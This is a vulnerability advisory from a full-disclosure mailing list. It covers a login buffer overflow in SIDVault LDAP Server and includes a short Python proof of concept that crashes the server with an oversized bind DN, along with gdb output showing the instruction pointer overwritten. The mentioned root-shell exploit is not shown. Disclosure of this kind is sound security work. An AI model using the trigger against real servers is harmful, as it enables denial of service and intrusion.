SIDVault LDAP Server Remote Buffer Overflow
===========================================
Product Description:
SIDVault LDAP Server for Win32 and GNU/Linux
SIDVault is a Simple Integration Database, allowing easy management and
installations with high performance LDAP v3 server. It supports any
number of schemas, easy to add/modify existing schemas, integrated web
based user access, and fast browser based administration tools. Supports
all relevant RFC protocols LDAP v2, LDAP v3, HTTP, ILS.
Vulnerable versions:
Win32 2.0e
Linux 2.0d
Vulnerability Details:
The login mechanism is prone to multiple buffer-overflow vulnerabilities
because it fails to adequately bounds-check user-supplied input before
copying it to an insufficiently sized buffer.
Successfully exploiting the issue will allow an attacker to execute
arbitrary code with root or SYSTEM-level privileges depending on the
operative system target. Failed exploit attempts will result in a
denial-of-service condition.
Proof of concept:
# gdb /usr/local/sidvault/sidvault
(...)
(gdb) r -run
In another terminal:
$ cat poc.py
import ldap
l = ldap.open("localhost")
l.simple_bind("dc=" + "A"*4099, "B"*256)
$ ./poc.py
In the first terminal:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1226736720 (LWP 5942)]
0x41414141 in ?? ()
(gdb) where
#0 0x41414141 in ?? ()
#1 0x41414141 in ?? ()
(...)
Quit
(gdb) i r
eax 0x8202c48 136326216
ecx 0x0 0
edx 0xb6e164df -1226742561
ebx 0x41414141 1094795585
esp 0xb6e16500 0xb6e16500
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41414141 0x41414141
Exploit:
An exploit for Debian based distributions which spawns a remote root
terminal has been writen. See the attached exploit.
Patch information:
The problem is solved in the latest version (2.0f) which is available in
the vendor's website at http://www.alphacentauri.co.nz/.
Thanks:
Thanks to Lynden Sherriff from Alphacentauri Ltd., he where very kind
and professional.
Disclaimer:
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Contact:
Joxean Koret - joxeankoret[at]yahoo[dot]es
-------------- next part --------------
A non-text attachment was scrubbed...
Name: exploit.py
Type: text/x-python
Size: 1723 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070826/b3f374a5/attachment.py
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 191 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070826/b3f374a5/attachment.bin